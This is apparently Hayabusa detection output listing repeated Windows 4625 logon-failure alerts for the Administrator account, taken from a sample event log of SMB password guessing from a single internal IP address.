2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
